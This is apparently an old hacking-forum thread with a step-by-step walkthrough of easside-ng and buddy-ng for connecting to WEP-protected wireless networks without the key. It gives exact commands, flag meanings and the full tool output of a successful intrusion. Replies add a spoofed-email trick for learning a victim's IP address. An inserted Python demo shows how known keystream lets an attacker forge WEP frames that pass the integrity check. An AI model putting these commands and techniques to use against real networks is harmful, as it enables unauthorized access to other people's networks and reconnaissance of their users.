Hey guys
Because I've now got my atheros card writing prga's properly I've been able to test these new tools. Here is a link to my patched drivers for atheros cards, it is a dirty fix until madwifi guys sort it but works fine for me and a few privileged friends that have the skill. Just download, make and make install.
NEW DRIVERS v1.2 27-11-07
http://www.mediafire.com/?5z1tl4tchmq
easside-ng is described as a wep magic wand tool for connecting to wep encrypted wireless networks without a WEP key. It does this by sniffing packets from a legit user and using these packets and the PRGA (pseudo random generation algorithm) xor data to encrypt new viable packets.
easside-ng works in two stages. First thing easside has to establish basic connectivity between easside-ng, buddy server and the access point. Once achieved easside-ng will attempt to communicate with the WIFI network. If successful you should be able to connect to the router and do just about anything.
Aircrack-ng guys describe this tool as stable but I wouldn't; it doesn't work all the time and it only works with open authentication systems.
Another downside is easside-ng and wesside-ng are useless at guessing the ip addys at the mo, so for testing purposes you may benefit from telling easside-ng what ip addys to use. This is because easside-ng uses .1 as default for the last digit in the user's IP and .123 for the router's. Another point is easside-ng requires a valid client using the internet and not just static.
Enough with the rabbling, more info at http://aircrack-ng.org/doku.php?id=easside-ng. Now let's begin.
First thing to do is set up a buddy server.
Code:
buddy-ng
It should respond
Code:
buddy-ng
Waiting for connexion
Now check your buddy server is running: open up an internet browser and type in the address bar
Code:
http://127.0.0.1:6969
Go back to the buddy window and you should now see
Code:
Waiting for connexion
Got connection from 127.0.0.1
That was it !
Waiting for connexion
If you see this, excellent, we are ready for easside-ng. This example is using the ip addys required. This is because I know the ip pool and subnet. Easside-ng can guess the ip pool and gateway but as default it adds .123 to the end of the gateway and .1 to the ip address.
Code:
mkdir temp
cd temp
modprobe tun
easside-ng -f ath1 -s 127.0.0.1 -r 192.168.1.254 -v 00:18:F6:79:1E:51 -i 192.168.1.64
Let's break it down
-s is the ip addy of the buddy server (you)
-f is the adaptor I am using
-r is the ip addy of the router
-v is the mac addy of the router
-i is the victims ip addy
Now if the hack was successful you should see the following on easside-ng shell
Code:
drgr33n crap # easside-ng -f ath1 -s 127.0.0.1 -r 192.168.1.254 -v 00:18:F6:79:1E:51 -i 192.168.1.64
Setting tap MTU
Sorting out wifi MAC
MAC is 00:01:02:EC:8F:1A
Setting tap MAC
[14:15:45.929815] Ownin...
Chan 07
SSID Hack-me Chan 7 Mac 00:DE:ff:00:ff:00
Sending auth request
Authenticated
Sending assoc request
Associated: 1
Unknown mgmt subtype 30
Assuming ARP 36
[14:16:11.424675] Got 22 bytes of PRGA IV [E3:67:7D]
[14:16:11.430123] Got 58 bytes of PRGA IV [E5:67:7D]
[14:16:11.539501] Got 166 bytes of PRGA IV [E8:67:7D]
[14:16:11.660668] Got 490 bytes of PRGA IV [E9:67:7D]
[14:16:11.784641] Got 1462 bytes of PRGA IV [EA:67:7D]
[14:16:12.027078] Got 1504 bytes of PRGA IV [EC:67:7D]
Sending who has 192.168.1.254 tell 192.168.1.64
Rtr MAC 00:ff:00:ff:77:F0
Trying to connect to buddy: 127.0.0.1:6969
Connected
Handshake compl33t
Checking for internet... 1
Checking for internet... 2
Checking for internet... 3
Internet w0rx. Public IP 127.0.0.1
Rtt 82ms
Now bring your virtual network device up
Code:
ifconfig at0 up
And you should be rockin
Another cool thing is you can use easside's prga data with wesside. Just navigate to the same temp folder and run wesside-ng to flood the network and grab the wep key. Aircrack cru are calling this "besside-ng" lol
Enjoy!
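Why the PRGA mentioned in the post above is all WEP requires, shown as an added example that is not part of the original thread or of aircrack-ng: a toy WEP encapsulation in Python showing that the ICV is an unkeyed CRC-32, so the receiver's integrity check passes for any frame body XORed with a keystream it has already used. The key, IV and payloads are constructed values, and the function names are hypothetical.

```python
import zlib

def rc4(key: bytes, n: int) -> bytes:
    """RC4 keystream of n bytes (key schedule, then the PRGA)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(data: bytes) -> bytes:
    """WEP integrity check value: a plain CRC-32, no key involved."""
    return zlib.crc32(data).to_bytes(4, "little")

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_seal(key: bytes, iv: bytes, payload: bytes) -> bytes:
    body = payload + icv(payload)
    return xor(body, rc4(iv + key, len(body)))  # per-frame RC4 key is IV || key

def wep_open(key: bytes, iv: bytes, ct: bytes):
    body = xor(ct, rc4(iv + key, len(ct)))
    payload, tag = body[:-4], body[-4:]
    return payload if tag == icv(payload) else None  # the receiver's only check

def keystream_from_known(plain: bytes, ct: bytes) -> bytes:
    """Known plaintext XOR ciphertext yields the keystream for that IV."""
    return xor(plain + icv(plain), ct)

def seal_with_keystream(ks: bytes, payload: bytes) -> bytes:
    body = payload + icv(payload)
    if len(body) > len(ks):
        raise ValueError("keystream shorter than frame body")
    return xor(body, ks)

KEY = bytes.fromhex("0102030405")  # constructed 40-bit WEP key
IV = bytes.fromhex("a1b2c3")       # constructed 24-bit IV
KNOWN = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + bytes(28)  # constructed, ARP-sized

def demo():
    ks = keystream_from_known(KNOWN, wep_seal(KEY, IV, KNOWN))
    frame = seal_with_keystream(ks, b"constructed payload")
    return wep_open(KEY, IV, frame)  # accepted although KEY was never used to build it
```

WPA2's CCMP closes this gap by computing the integrity tag with the session key and rejecting replayed packet numbers, which is why the thread's technique is specific to WEP.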
nice one
but so weird that my alfa usb adapter can't do this :'(
greetings
I just don't see how this is useful at all. I would love for someone to explain how this can be used that other tools don't do much better. For one, how am I going to know the victim IP if I'm outside the LAN?
--=Xploitz=-- ®
Remote-Exploit.orgs Master Tutorialist.™
VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial": http://forums.remote-exploit.org/showthread.php?t=9063
VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial": http://forums.remote-exploit.org/showthread.php?t=7872
VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial": http://forums.remote-exploit.org/showthread.php?t=8230
VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases": http://forums.remote-exploit.org/showthread.php?t=8041
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
LOL!!
But on the serious side..did you see my edit?
That's the only real way I can think of accomplishing this unless you use Kismet,.... or,.... open a capture in Wireshark maybe and search for the IP,.. or you actually do a spoofed email, and request a delivery return receipt.
BTW..I was kinda serious about the whole E-mail return receipt thing. If you send someone an Email..you can (with some Email clients) request a return receipt..much like our forums PM system is setup...and get their IP that way. I just don't suggest using your real E-mail address if you're a wanna be blackhat..because you could get caught and you could get into trouble.
lol it should guess the ip and gateway but it's rubbish, might be because of my dirty drivers. Now uploading v1.1 with support for much more cards.
This is exactly my point. Why go through all this crap when wep can be broken almost as fast as I can type the commands.
because I'm doing a uni course and this is going to score me extra points, but yes I see your point purehate, aircrack will crack 64 bit wep with around 10000 ivs